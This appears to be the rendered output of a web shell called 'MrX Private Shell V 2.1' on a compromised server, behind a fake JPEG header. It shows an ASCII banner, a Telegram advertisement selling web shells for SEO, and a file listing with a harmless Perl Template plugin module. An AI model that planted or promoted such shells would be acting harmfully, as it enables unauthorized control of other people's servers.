����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
package MyPlugs::Foo;
use Template::Plugin;
use base qw( Template::Plugin );
sub new {
my ($class, $context, $value) = @_;
bless {
VALUE => $value,
}, $class;
}
sub output {
my $self = shift;
return "This is the Foo plugin, value is $self->{ VALUE }";
}
1;
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| Bar.pm | File | 282 B | 0644 |
|
| Baz.pm | File | 216 B | 0644 |
|
| Foo.pm | File | 282 B | 0644 |
|